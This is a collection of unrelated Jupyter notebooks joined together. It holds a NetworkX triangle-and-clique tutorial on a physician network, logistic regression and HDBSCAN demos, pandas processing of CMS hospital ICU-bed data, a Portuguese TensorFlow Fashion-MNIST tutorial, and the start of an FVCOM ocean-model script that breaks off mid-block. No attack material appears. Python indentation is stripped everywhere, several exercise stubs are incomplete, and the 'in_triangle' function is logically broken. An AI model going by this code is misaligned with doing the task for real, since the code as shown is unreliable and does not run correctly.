> This directed network captures innovation spread among 246 physicians in for towns in Illinois, Peoria, Bloomington, Quincy and Galesburg. The data was collected in 1966. A node represents a physician and an edge between two physicians shows that the left physician told that the righ physician is his friend or that he turns to the right physician if he needs advice or is interested in a discussion. There always only exists one edge between two nodes even if more than one of the listed conditions are true.
```
# Load the network.
G = cf.load_physicians_network()
# Make a Circos plot of the graph
import numpy as np
from circos import CircosPlot
nodes = sorted(G.nodes())
edges = G.edges()
edgeprops = dict(alpha=0.1)
nodecolor = plt.cm.viridis(np.arange(len(nodes)) / len(nodes))
fig = plt.figure(figsize=(6,6))
ax = fig.add_subplot(111)
c = CircosPlot(nodes, edges, radius=10, ax=ax, edgeprops=edgeprops, nodecolor=nodecolor)
c.draw()
```
### Question
What can you infer about the structure of the graph from the Circos plot?
My answer: The structure is interesting. The graph looks like the physician trust network is comprised of discrete subnetworks.
## Cliques
In a social network, cliques are groups of people in which everybody knows everybody. Triangles are a simple example of cliques. Let's try implementing a simple algorithm that finds out whether a node is present in a triangle or not.
The core idea is that if a node is present in a triangle, then its neighbors' neighbors' neighbors should include itself.
```
# Example code that shouldn't be too hard to follow.
def in_triangle(G, node):
neighbors1 = G.neighbors(node)
neighbors2 = []
for n in neighbors1:
neighbors = G.neighbors(n)
if node in neighbors2:
neighbors2.remove(node)
neighbors2.extend(G.neighbors(n))
neighbors3 = []
for n in neighbors2:
neighbors = G.neighbors(n)
neighbors3.extend(G.neighbors(n))
return node in neighbors3
in_triangle(G, 3)
```
In reality, NetworkX already has a function that *counts* the number of triangles that any given node is involved in. This is probably more useful than knowing whether a node is present in a triangle or not, but the above code was simply for practice.
```
nx.triangles(G, 3)
```
### Exercise
Can you write a function that takes in one node and its associated graph as an input, and returns a list or set of itself + all other nodes that it is in a triangle relationship with?
Hint: The neighbor of my neighbor should also be my neighbor, then the three of us are in a triangle relationship.
Hint: Python Sets may be of great use for this problem. https://docs.python.org/2/library/stdtypes.html#set
Verify your answer by drawing out the subgraph composed of those nodes.
```
# Possible answer
def get_triangles(G, node):
neighbors = set(G.neighbors(node))
triangle_nodes = set()
"""
Fill in the rest of the code below.
"""
return triangle_nodes
# Verify your answer with the following funciton call. Should return:
# {1, 2, 3, 6, 23}
get_triangles(G, 3)
# Then, draw out those nodes.
nx.draw(G.subgraph(get_triangles(G, 3)), with_labels=True)
# Compare for yourself that those are the only triangles that node 3 is involved in.
neighbors3 = G.neighbors(3)
neighbors3.append(3)
nx.draw(G.subgraph(neighbors3), with_labels=True)
```
# Friend Recommendation: Open Triangles
Now that we have some code that identifies closed triangles, we might want to see if we can do some friend recommendations by looking for open triangles.
Open triangles are like those that we described earlier on - A knows B and B knows C, but C's relationship with A isn't captured in the graph.
### Exercise
Can you write a function that identifies, for a given node, the other two nodes that it is involved with in an open triangle, if there is one?
Hint: You may still want to stick with set operations. Suppose we have the A-B-C triangle. If there are neighbors of C that are also neighbors of B, then those neighbors are in a triangle with B and C; consequently, if there are nodes for which C's neighbors do not overlap with B's neighbors, then those nodes are in an open triangle. The final implementation should include some conditions, and probably won't be as simple as described above.
```
# Possible Answer, credit Justin Zabilansky (MIT) for help on this.
def get_open_triangles(G, node):
"""
There are many ways to represent this. One may choose to represent only the nodes involved
in an open triangle; this is not the approach taken here.
Rather, we have a code that explicitly enumrates every open triangle present.
"""
open_triangle_nodes = []
neighbors = set(G.neighbors(node))
for n in neighbors:
return open_triangle_nodes
# # Uncomment the following code if you want to draw out each of the triplets.
# nodes = get_open_triangles(G, 2)
# for i, triplet in enumerate(nodes):
# fig = plt.figure(i)
# nx.draw(G.subgraph(triplet), with_labels=True)
print(get_open_triangles(G, 3))
len(get_open_triangles(G, 3))
```
If you remember the previous section on hubs and paths, you will note that node 19 was involved in a lot of open triangles.
Triangle closure is also the core idea behind social networks' friend recommendation systems; of course, it's definitely more complicated than what we've implemented here.
## Cliques
We have figured out how to find triangles. Now, let's find out what **cliques** are present in the network. Recall: what is the definition of a clique?
- NetworkX has a [clique-finding](https://networkx.github.io/documentation/networkx-1.10/reference/generated/networkx.algorithms.clique.find_cliques.html) algorithm implemented.
- This algorithm finds all maximally-sized cliques for a given node.
- Note that maximal cliques of size `n` include all cliques of `size < n`
```
list(nx.find_cliques(G))
```
### Exercise
This should allow us to find all n-sized maximal cliques. Try writing a function `maximal_cliques_of_size(size, G)` that implements this.
```
def maximal_cliqes_of_size(size, G):
return ______________________
maximal_cliqes_of_size(2, G)
```
## Connected Components
From [Wikipedia](https://en.wikipedia.org/wiki/Connected_component_%28graph_theory%29):
> In graph theory, a connected component (or just component) of an undirected graph is a subgraph in which any two vertices are connected to each other by paths, and which is connected to no additional vertices in the supergraph.
NetworkX also implements a [function](https://networkx.github.io/documentation/networkx-1.9.1/reference/generated/networkx.algorithms.components.connected.connected_component_subgraphs.html) that identifies connected component subgraphs.
Remember how based on the Circos plot above, we had this hypothesis that the physician trust network may be divided into subgraphs. Let's check that, and see if we can redraw the Circos visualization.
```
ccsubgraphs = list(nx.connected_component_subgraphs(G))
len(ccsubgraphs)
```
### Exercise
Play a bit with the Circos API. Can you colour the nodes by their subgraph identifier?
```
# Start by labelling each node in the master graph G by some number
# that represents the subgraph that contains the node.
for i, g in enumerate(_____________):
# Then, pass in a list of nodecolors that correspond to the node order.
node_cmap = {0: 'red', 1:'blue', 2: 'green', 3:'yellow'}
nodecolor = [__________________________________________]
nodes = sorted(G.nodes())
edges = G.edges()
edgeprops = dict(alpha=0.1)
fig = plt.figure(figsize=(6,6))
ax = fig.add_subplot(111)
c = CircosPlot(nodes, edges, radius=10, ax=ax, fig=fig, edgeprops=edgeprops, nodecolor=nodecolor)
c.draw()
plt.savefig('images/physicians.png', dpi=300)
```
And "admire" the division of the US congress over the years...

| github_jupyter |
```
# Logistic Regression
# Importing the libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# Importing the dataset
dataset = pd.read_csv('Social_Network_Ads.csv')
X = dataset.iloc[:, [2, 3]].values
y = dataset.iloc[:, 4].values
# Splitting the dataset into the Training set and Test set
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.25, random_state = 0)
# Feature Scaling
from sklearn.preprocessing import StandardScaler
sc = StandardScaler()
X_train = sc.fit_transform(X_train)
X_test = sc.transform(X_test)
# Fitting Logistic Regression to the Training set
from sklearn.linear_model import LogisticRegression
classifier = LogisticRegression(random_state = 0)
classifier.fit(X_train, y_train)
# Predicting the Test set results
y_pred = classifier.predict(X_test)
# Making the Confusion Matrix
from sklearn.metrics import confusion_matrix
cm = confusion_matrix(y_test, y_pred)
# Visualising the Training set results
from matplotlib.colors import ListedColormap
X_set, y_set = X_train, y_train
X1, X2 = np.meshgrid(np.arange(start = X_set[:, 0].min() - 1, stop = X_set[:, 0].max() + 1, step = 0.01),
np.arange(start = X_set[:, 1].min() - 1, stop = X_set[:, 1].max() + 1, step = 0.01))
plt.contourf(X1, X2, classifier.predict(np.array([X1.ravel(), X2.ravel()]).T).reshape(X1.shape),
alpha = 0.75, cmap = ListedColormap(('red', 'green')))
plt.xlim(X1.min(), X1.max())
plt.ylim(X2.min(), X2.max())
for i, j in enumerate(np.unique(y_set)):
plt.scatter(X_set[y_set == j, 0], X_set[y_set == j, 1],
c = ListedColormap(('red', 'green'))(i), label = j)
plt.title('Logistic Regression (Training set)')
plt.xlabel('Age')
plt.ylabel('Estimated Salary')
plt.legend()
plt.show()
# Visualising the Test set results
from matplotlib.colors import ListedColormap
X_set, y_set = X_test, y_test
X1, X2 = np.meshgrid(np.arange(start = X_set[:, 0].min() - 1, stop = X_set[:, 0].max() + 1, step = 0.01),
np.arange(start = X_set[:, 1].min() - 1, stop = X_set[:, 1].max() + 1, step = 0.01))
plt.contourf(X1, X2, classifier.predict(np.array([X1.ravel(), X2.ravel()]).T).reshape(X1.shape),
alpha = 0.75, cmap = ListedColormap(('red', 'green')))
plt.xlim(X1.min(), X1.max())
plt.ylim(X2.min(), X2.max())
for i, j in enumerate(np.unique(y_set)):
plt.scatter(X_set[y_set == j, 0], X_set[y_set == j, 1],
c = ListedColormap(('red', 'green'))(i), label = j)
plt.title('Logistic Regression (Test set)')
plt.xlabel('Age')
plt.ylabel('Estimated Salary')
plt.legend()
plt.show()
```
| github_jupyter |
```
%matplotlib notebook
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.tri as tri
from matplotlib import cm
from mpl_toolkits.mplot3d import Axes3D
import hdbscan
from sklearn.datasets import make_blobs
from deepART import dataset
x, y = make_blobs(n_samples=200, n_features=2, centers=np.array([[0.7, 0.55], [0.95,0.95]]), cluster_std=0.03, center_box=(0, 1), shuffle=True, random_state=100)
sample_data = dataset.Dataset(x)
fig = plt.figure(figsize=(8,8))
ax = fig.add_subplot(111)
ax.set_xlabel("X",fontsize=12)
ax.set_ylabel("Y",fontsize=12)
ax.grid(True,linestyle='-',color='0.75')
# scatter with colormap mapping
ax.scatter(sample_data.data_normalized[...,0],sample_data.data_normalized[...,1],s=100,c=y,marker='*')
ax.axis((0, 1, 0, 1))
plt.ylim(0.4, 1.1)
plt.xlim(0.6, 1.1)
plt.show()
#fig.savefig('data_raw.png', bbox_inches='tight')
clusterer = hdbscan.HDBSCAN(min_cluster_size=10, prediction_data=True).fit(sample_data.data_normalized)
clusterer.probabilities_
def unpack_results(pred,target,target_scores):
#unpack result tuples
pred_k = []
scores = []
data_contour = np.empty((0,2),dtype=np.float32)
for n, results in enumerate(pred):
if results == target:
data_contour = np.vstack((data_contour, sample_data.data_normalized[n]))
scores.append(target_scores[n])
return data_contour, scores
def plot_countour(fig,data_contour, scores, sub_index, nplots=(3,2)):
ax = fig.add_subplot(nplots[0],nplots[1],sub_index)
ax.set_title("Clustering Results ",fontsize=14)
ax.set_xlabel("X",fontsize=12)
ax.set_ylabel("Y",fontsize=12)
ax.grid(True,linestyle='-',color='0.75')
# scatter with colormap mapping to predicted class
ax.tricontour(data_contour[...,0], data_contour[...,1], scores, 14, linewidths=0, colors='k')
cntr2 = ax.tricontourf(data_contour[...,0], data_contour[...,1], scores, 14, cmap="RdBu_r",)
fig.colorbar(cntr2, ax=ax)
ax.plot(data_contour[...,0], data_contour[...,1], 'ko', ms=0.5)
ax.axis((0, 1, 0, 1))
ax.set_title('Cluster {}'.format(int(sub_index-1)))
plt.subplots_adjust(hspace=0.5)
plt.show()
#fig.savefig('data_clustered.png', bbox_inches='tight')
#plot out clusters memebership
fig = plt.figure(figsize=(8,8))
nplots = (int(np.ceil(2/2)), 2)
for i in range(2):
data_contour, scores = unpack_results(clusterer.labels_,target=i, target_scores=clusterer.probabilities_)
plot_countour(fig, data_contour,scores, sub_index=i+1,nplots=nplots)
# plt.savefig("hdbscan_contour_1.png")
fig = plt.figure(figsize=(8,8))
ax = fig.add_subplot(111)
# ax.set_title("HDBSCAN's Predictions ",fontsize=14)
ax.set_xlabel("X",fontsize=12)
ax.set_ylabel("Y",fontsize=12)
# ax.set_ylabel("Z",fontsize=12)
ax.grid(True,linestyle='-',color='0.75')
# scatter with colormap mapping to predicted class
ax.scatter(sample_data.data_normalized[...,0],sample_data.data_normalized[...,1],s=100,c=clusterer.labels_, marker = '*', cmap = cm.jet_r );
plt.show()
# plt.savefig("hdbscan_correct_1.png")
clusterer.labels_
y
mapping = {0:1, 1: 0}
pred_labels = list(map(lambda i: mapping[i], clusterer.labels_))
from sklearn.metrics import silhouette_score, davies_bouldin_score, precision_score, recall_score, f1_score, accuracy_score, normalized_mutual_info_score
def obtain_metrics(x, y_true, y_pred):
results = dict({})
results["silhouette_score"] = silhouette_score(x, y_pred)
results["davies_bouldin_score"] = davies_bouldin_score(x, y_pred)
results["normalized_mutual_info_score"] = normalized_mutual_info_score(y_true, y_pred)
results["precision_score"] = precision_score(y_true, y_pred)
results["recall_score"] = recall_score(y_true, y_pred)
results["f1_score"] = f1_score(y_true, y_pred)
results["accuracy_score"] = accuracy_score(y_true, y_pred)
return results
obtain_metrics(sample_data.data_normalized, y, pred_labels)
```
| github_jupyter |
```
import pandas as pd
```
Gonna try a test of grabbing the ICU beds
**Starting with 2019 data for ease of use, I first read in the numeric data. I created new headers because they didn't bother to include them.**
```
num = pd.read_csv('../source/cost_reports/2017/HOSP10FY2017/hosp10_2017_NMRC.CSV', header=None, names=['RPT_REC_NUM','WKSHT_CD',
'LINE_NUM', 'CLMN_NUM','ITM_VAL_NUM'],
dtype={'LINE_NUM':str})
num.head()
num.info()
```
**Then, I filter the numeric data to just the line I want: Worksheet S3, line 8, column 2: The number of ICU beds in each report.**
```
icu_beds = num[(num['WKSHT_CD'] == 'S300001') & (num['CLMN_NUM'] == '00200') & (num.LINE_NUM == '00800')]
icu_beds.head()
icu_beds.ITM_VAL_NUM.sum()
```
**Adding the RPT dataset allows me to grab the provider number of each hospital, as well as its report status (since this is a newer datset, many have blanks)**
```
rpt = pd.read_csv('../source/cost_reports/2017/HOSP10FY2017/hosp10_2017_RPT.CSV', header=None, names=['RPT_REC_NUM',
'PRVDR_CTRL_TYPE_CD', 'PRVDR_NUM',
'Unknown','RPT_STUS_CD',
'FY_BGN_DATE', 'FY_END_DATE',
'PROC_DT',
'INITL_RPT_SW', 'LAST_RPT_SW',
'TRNSMTL_NUM', 'FI_NUM',
'ADR_VNDR_CD', 'FI_CREAT_DT',
'UTIL_CD',
'NPR_DT', 'SPEC_IND',
'FI_RCPT_DT'],
dtype={'PRVDR_NUM':str})
rpt.head()
```
Unfortunately, there are dupes! Hmmmm...
```
rpt.pivot_table(index='PRVDR_NUM', values='RPT_REC_NUM', aggfunc=len).sort_values(by='RPT_REC_NUM', ascending=False).head()
```
It turns out quite a few have ones from 2016, let's eliminate those?
```
rpt['Year'] = rpt.FY_END_DATE.str[-4:]
rpt.head()
```
Pick the later of the two from each provider number
```
rpt_top = rpt.sort_values('Year',ascending = False).groupby('PRVDR_NUM').head(1)
rpt_top.pivot_table(index='PRVDR_NUM', values='RPT_REC_NUM', aggfunc=len).sort_values(by='RPT_REC_NUM', ascending=False).head()
```
Merging with the ICU beds dataset:
```
icu_rpt = icu_beds.merge(rpt_top, on='RPT_REC_NUM', how='left')
icu_rpt.head()
icu_rpt.info()
```
**Next, adding name, characteristics etc. of each hospital to the dataset. This is based on the provider number.**
```
hc = pd.read_csv('../source/hospital_compare/Hospital_General_Information.csv')
hc.head()
icu_info = icu_rpt.merge(hc, left_on='PRVDR_NUM', right_on='Facility ID')
icu_info.head()
icu_info.to_csv('processed/2017_ICU_beds.csv')
```
| github_jupyter |
##### Copyright 2018 The TensorFlow Authors.
```
#@title Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#@title MIT License
#
# Copyright (c) 2017 François Chollet
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
```
# Treine sua primeira rede neural: classificação básica
<table class="tfo-notebook-buttons" align="left">
<td>
<a target="_blank" href="https://www.tensorflow.org/tutorials/keras/classification"><img src="https://www.tensorflow.org/images/tf_logo_32px.png" />Veja em TensorFlow.org</a>
</td>
<td>
<a target="_blank" href="https://colab.research.google.com/github/tensorflow/docs-l10n/blob/master/site/pt-br/tutorials/keras/classification.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" />Execute em Google Colab</a>
</td>
<td>
<a target="_blank" href="https://github.com/tensorflow/docs-l10n/blob/master/site/pt-br/tutorials/keras/classification.ipynb"><img src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" />Veja código fonte em GitHub</a>
</td>
<td>
<a href="https://storage.googleapis.com/tensorflow_docs/docs-l10n/site/pt-br/tutorials/keras/classification.ipynb"><img src="https://www.tensorflow.org/images/download_logo_32px.png" />Baixe o notebook</a>
</td>
</table>
Note: A nossa comunidade TensorFlow traduziu estes documentos. Como as traduções da comunidade são *o melhor esforço*, não há garantias de que sejam uma reflexão exata e atualizada da [documentação oficial em Inglês](https://www.tensorflow.org/?hl=en). Se tem alguma sugestão para melhorar esta tradução, por favor envie um pull request para o repositório do GitHub [tensorflow/docs](https://github.com/tensorflow/docs). Para se voluntariar para escrever ou rever as traduções da comunidade, contacte a [lista docs@tensorflow.org](https://groups.google.com/a/tensorflow.org/forum/#!forum/docs).
Este tutorial treina um modelo de rede neural para classificação de imagens de roupas, como tênis e camisetas. Tudo bem se você não entender todos os detalhes; este é um visão geral de um programa do TensorFlow com detalhes explicados enquanto progredimos.
O guia usa [tf.keras](https://www.tensorflow.org/guide/keras), uma API alto-nível para construir e treinar modelos no TensorFlow.
```
# TensorFlow e tf.keras
import tensorflow as tf
from tensorflow import keras
# Librariesauxiliares
import numpy as np
import matplotlib.pyplot as plt
print(tf.__version__)
```
## Importe a base de dados Fashion MNIST
Esse tutorial usa a base de dados [Fashion MNIST](https://github.com/zalandoresearch/fashion-mnist) que contém 70,000 imagens em tons de cinza em 10 categorias. As imagens mostram artigos individuais de roupas com baixa resolução (28 por 28 pixels), como vemos aqui:
<table>
<tr><td>
<img src="https://tensorflow.org/images/fashion-mnist-sprite.png"
alt="Fashion MNIST sprite" width="600">
</td></tr>
<tr><td align="center">
<b>Figure 1.</b> <a href="https://github.com/zalandoresearch/fashion-mnist">Amostras de Fashion-MNIST</a> (por Zalando, MIT License).<br/>
</td></tr>
</table>
Fashion MNIST tem como intenção substituir a clássica base de dados [MNIST](http://yann.lecun.com/exdb/mnist/ )— frequentemente usada como "Hello, World" de programas de aprendizado de máquina (*machine learning*) para visão computacional. A base de dados MNIST contém imagens de dígitos escritos à mão (0, 1, 2, etc.) em um formato idêntico ao dos artigos de roupas que usaremos aqui.
Esse tutorial usa a Fashion MNIST para variar, e porque é um problema um pouco mais desafiador que o regular MNIST. Ambas bases são relativamente pequenas e são usadas para verificar se um algoritmo funciona como esperado. Elas são bons pontos de partida para testar e debugar código.
Usaremos 60,000 imagens para treinar nossa rede e 10,000 imagens para avaliar quão precisamente nossa rede aprendeu a classificar as imagens. Você pode acessar a Fashion MNIST directly diretamente do TensorFlow. Importe e carregue a base Fashion MNIST diretamente do TensorFlow:
```
fashion_mnist = keras.datasets.fashion_mnist
(train_images, train_labels), (test_images, test_labels) = fashion_mnist.load_data()
```
Carregando a base de dados que retorna quatro NumPy arrays:
* Os *arrays* `train_images` e `train_labels` são o *conjunto de treinamento*— os dados do modelo usados para aprender.
* O modelo é testado com o *conjunto de teste*, os *arrays* `test_images` e `test_labels`.
As imagens são arrays NumPy de 28x28, com os valores des pixels entre 0 to 255. As *labels* (alvo da classificação) são um array de inteiros, no intervalo de 0 a 9. Esse corresponde com a classe de roupa que cada imagem representa:
<table>
<tr>
<th>Label</th>
<th>Classe</th>
</tr>
<tr>
<td>0</td>
<td>Camisetas/Top (T-shirt/top)</td>
</tr>
<tr>
<td>1</td>
<td>Calça (Trouser)</td>
</tr>
<tr>
<td>2</td>
<td>Suéter (Pullover)</td>
</tr>
<tr>
<td>3</td>
<td>Vestidos (Dress)</td>
</tr>
<tr>
<td>4</td>
<td>Casaco (Coat)</td>
</tr>
<tr>
<td>5</td>
<td>Sandálias (Sandal)</td>
</tr>
<tr>
<td>6</td>
<td>Camisas (Shirt)</td>
</tr>
<tr>
<td>7</td>
<td>Tênis (Sneaker)</td>
</tr>
<tr>
<td>8</td>
<td>Bolsa (Bag)</td>
</tr>
<tr>
<td>9</td>
<td>Botas (Ankle boot)</td>
</tr>
</table>
Cada imagem é mapeada com um só label. Já que o *nome das classes* não são incluídas na base de dados, armazene os dados aqui para usá-los mais tarde quando plotarmos as imagens:
```
class_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat',
'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']
```
## Explore os dados
Vamos explorar o formato da base de dados antes de treinar o modelo. O próximo comando mostra que existem 60000 imagens no conjunto de treinamento, e cada imagem é representada em 28 x 28 pixels:
```
train_images.shape
```
Do mesmo modo, existem 60000 labels no conjunto de treinamento:
```
len(train_labels)
```
Cada label é um inteiro entre 0 e 9:
```
train_labels
```
Existem 10000 imagens no conjnto de teste. Novamente, cada imagem é representada por 28 x 28 pixels:
```
test_images.shape
```
E um conjunto de teste contendo 10000 labels das imagens :
```
len(test_labels)
```
## Pré-processe os dados
Os dados precisam ser pré-processados antes de treinar a rede. Se você inspecionar a primeira imagem do conjunto de treinamento, você verá que os valores dos pixels estão entre 0 e 255:
```
plt.figure()
plt.imshow(train_images[0])
plt.colorbar()
plt.grid(False)
plt.show()
```
Escalaremos esses valores no intervalo de 0 e 1 antes antes de alimentar o modelo da rede neural. Para fazer isso, dividimos os valores por 255. É importante que o *conjunto de treinamento* e o *conjunto de teste* podem ser pré-processados do mesmo modo:
```
train_images = train_images / 255.0
test_images = test_images / 255.0
```
Para verificar que os dados estão no formato correto e que estamos prontos para construir e treinar a rede, vamos mostrar as primeiras 25 imagens do *conjunto de treinamento* e mostrar o nome das classes de cada imagem abaixo.
```
plt.figure(figsize=(10,10))
for i in range(25):
plt.subplot(5,5,i+1)
plt.xticks([])
plt.yticks([])
plt.grid(False)
plt.imshow(train_images[i], cmap=plt.cm.binary)
plt.xlabel(class_names[train_labels[i]])
plt.show()
```
## Construindo o modelo
Construir a rede neural requer configurar as camadas do modelo, e depois, compilar o modelo.
### Montar as camadas
O principal bloco de construção da rede neural é a camada (*layer*). As camadas (*layers*) extraem representações dos dados inseridos na rede. Com sorte, essas representações são significativas para o problema à mão.
Muito do *deep learning* consiste encadear simples camadas. Muitas camadas, como `tf.keras.layers.Dense`, tem paramêtros que são aprendidos durante o treinamento.
```
model = keras.Sequential([
keras.layers.Flatten(input_shape=(28, 28)),
keras.layers.Dense(128, activation='relu'),
keras.layers.Dense(10, activation='softmax')
])
```
A primeira camada da rede, `tf.keras.layers.Flatten`, transforma o formato da imagem de um array de imagens de duas dimensões (of 28 by 28 pixels) para um array de uma dimensão (de 28 * 28 = 784 pixels). Pense nessa camada como camadas não empilhadas de pixels de uma imagem e os emfilere. Essa camada não tem paramêtros para aprender; ela só reformata os dados.
Depois dos pixels serem achatados, a rede consite de uma sequência de duas camadas `tf.keras.layers.Dense`. Essa são camadas neurais *densely connected*, ou *fully connected*. A primeira camada `Dense` tem 128 nós (ou neurônios). A segunda (e última) camda é uma *softmax* de 10 nós que retorna um array de 10 probabilidades, cuja soma resulta em 1. Cada nó contem um valor que indica a probabilidade de que aquela imagem pertence a uma das 10 classes.
### Compile o modelo
Antes do modelo estar pronto para o treinamento, é necessário algumas configurações a mais. Essas serão adicionadas no passo de *compilação*:
* *Função Loss* —Essa mede quão precisa o modelo é durante o treinamento. Queremos minimizar a função para *guiar* o modelo para direção certa.
* *Optimizer* —Isso é como o modelo se atualiza com base no dado que ele vê e sua função *loss*.
* *Métricas* —usadas para monitorar os passos de treinamento e teste. O exemplo abaixo usa a *acurácia*, a fração das imagens que foram classificadas corretamente.
```
model.compile(optimizer='adam',
loss='sparse_categorical_crossentropy',
metrics=['accuracy'])
```
## Treine o modelo
Treinar a rede neural requer os seguintes passos:
1. Alimente com os dados de treinamento, o modelo. Neste exemplo, os dados de treinamento são os arrays `train_images` e `train_labels`.
2. O modelo aprende como associar as imagens as *labels*.
3. Perguntamos ao modelo para fazer previsões sobre o conjunto de teste — nesse exemplo, o array `test_images`. Verificamos se as previsões combinaram com as *labels* do array `test_labels`.
Para começar a treinar, chame o método `model.fit`— assim chamado, porque ele "encaixa" o modelo no conjunto de treinamento:
```
model.fit(train_images, train_labels, epochs=10)
```
À medida que o modelo treina, as métricas loss e acurácia são mostradas. O modelo atinge uma acurácia de 0.88 (ou 88%) com o conjunto de treinamento.
## Avalie a acurácia
Depois, compare como o modelo performou com o conjunto de teste:
```
test_loss, test_acc = model.evaluate(test_images, test_labels, verbose=2)
print('\nTest accuracy:', test_acc)
```
Acabou que o a acurácia com o conjunto de teste é um pouco menor do que a acurácia de treinamento. Essa diferença entre as duas acurácias representa um *overfitting*. Overfitting é modelo de aprendizado de máquina performou de maneira pior em um conjunto de entradas novas, e não usadas anteriormente, que usando o conjunto de treinamento.
## Faça predições
Com o modelo treinado, o usaremos para predições de algumas imagens.
```
predictions = model.predict(test_images)
```
Aqui, o modelo previu que a *label* de cada imagem no conjunto de treinamento. Vamos olhar na primeira predição:
```
predictions[0]
```
A predição é um array de 10 números. Eles representam um a *confiança* do modelo que a imagem corresponde a cada um dos diferentes artigos de roupa. Podemos ver cada *label* tem um maior valor de confiança:
```
np.argmax(predictions[0])
```
Então, o modelo é confiante de que esse imagem é uma bota (ankle boot) ou `class_names[9]`. Examinando a label do teste, vemos que essa classificação é correta:
```
test_labels[0]
```
Podemos mostrar graficamente como se parece em um conjunto total de previsão de 10 classes.
```
def plot_image(i, predictions_array, true_label, img):
predictions_array, true_label, img = predictions_array[i], true_label[i], img[i]
plt.grid(False)
plt.xticks([])
plt.yticks([])
plt.imshow(img, cmap=plt.cm.binary)
predicted_label = np.argmax(predictions_array)
if predicted_label == true_label:
color = 'blue'
else:
color = 'red'
plt.xlabel("{} {:2.0f}% ({})".format(class_names[predicted_label],
100*np.max(predictions_array),
class_names[true_label]),
color=color)
def plot_value_array(i, predictions_array, true_label):
predictions_array, true_label = predictions_array[i], true_label[i]
plt.grid(False)
plt.xticks([])
plt.yticks([])
thisplot = plt.bar(range(10), predictions_array, color="#777777")
plt.ylim([0, 1])
predicted_label = np.argmax(predictions_array)
thisplot[predicted_label].set_color('red')
thisplot[true_label].set_color('blue')
```
Vamos olhar a previsão imagem na posição 0, do array de predição.
```
i = 0
plt.figure(figsize=(6,3))
plt.subplot(1,2,1)
plot_image(i, predictions, test_labels, test_images)
plt.subplot(1,2,2)
plot_value_array(i, predictions, test_labels)
plt.show()
i = 12
plt.figure(figsize=(6,3))
plt.subplot(1,2,1)
plot_image(i, predictions, test_labels, test_images)
plt.subplot(1,2,2)
plot_value_array(i, predictions, test_labels)
plt.show()
```
Vamos plotar algumas da previsão do modelo. Labels preditas corretamente são azuis e as predições erradas são vermelhas. O número dá a porcentagem (de 100) das labels preditas. Note que o modelo pode errar mesmo estão confiante.
```
# Plota o primeiro X test images, e as labels preditas, e as labels verdadeiras.
# Colore as predições corretas de azul e as incorretas de vermelho.
num_rows = 5
num_cols = 3
num_images = num_rows*num_cols
plt.figure(figsize=(2*2*num_cols, 2*num_rows))
for i in range(num_images):
plt.subplot(num_rows, 2*num_cols, 2*i+1)
plot_image(i, predictions, test_labels, test_images)
plt.subplot(num_rows, 2*num_cols, 2*i+2)
plot_value_array(i, predictions, test_labels)
plt.show()
```
Finamente, use o modelo treinado para fazer a predição de uma única imagem.
```
# Grab an image from the test dataset.
img = test_images[0]
print(img.shape)
```
Modelos `tf.keras` são otimizados para fazer predições em um *batch*, ou coleções, de exemplos de uma vez. De acordo, mesmo que usemos uma única imagem, precisamos adicionar em uma lista:
```
# Adiciona a imagem em um batch que possui um só membro.
img = (np.expand_dims(img,0))
print(img.shape)
```
Agora prediremos a label correta para essa imagem:
```
predictions_single = model.predict(img)
print(predictions_single)
plot_value_array(0, predictions_single, test_labels)
_ = plt.xticks(range(10), class_names, rotation=45)
```
`model.predict` retorna a lista de listas — uma lista para cada imagem em um *batch* de dados. Pegue a predição de nossa (única) imagem no *batch*:
```
np.argmax(predictions_single[0])
```
E, como antes, o modelo previu a label como 9.
| github_jupyter |
# Extract FVCOM time series from aggregated OPeNDAP endpoints
```
# Plot time series data from FVCOM model from list of lon,lat locations
# (uses the nearest point, no interpolation)
%matplotlib inline
import numpy as np
import matplotlib.pyplot as plt
import netCDF4
import datetime as dt
import pandas as pd
from StringIO import StringIO
# make dictionary of various model simulation endpoints
models={}
models['Massbay_forecast']='http://www.smast.umassd.edu:8080/thredds/dodsC/FVCOM/NECOFS/Forecasts/NECOFS_FVCOM_OCEAN_MASSBAY_FORECAST.nc'
models['GOM3_Forecast']='http://www.smast.umassd.edu:8080/thredds/dodsC/FVCOM/NECOFS/Forecasts/NECOFS_GOM3_FORECAST.nc'
models['Massbay_forecast_archive']='http://www.smast.umassd.edu:8080/thredds/dodsC/fvcom/archives/necofs_mb'
models['GOM3_30_year_hindcast']='http://www.smast.umassd.edu:8080/thredds/dodsC/fvcom/hindcasts/30yr_gom3'
def start_stop(url,tvar):
nc = netCDF4.Dataset(url)
ncv = nc.variables
time_var = ncv[tvar]
first = netCDF4.num2date(time_var[0],time_var.units)
last = netCDF4.num2date(time_var[-1],time_var.units)
print first.strftime('%Y-%b-%d %H:%M')
print last.strftime('%Y-%b-%d %H:%M')
tvar = 'time'
for model,url in models.iteritems():
print model
try:
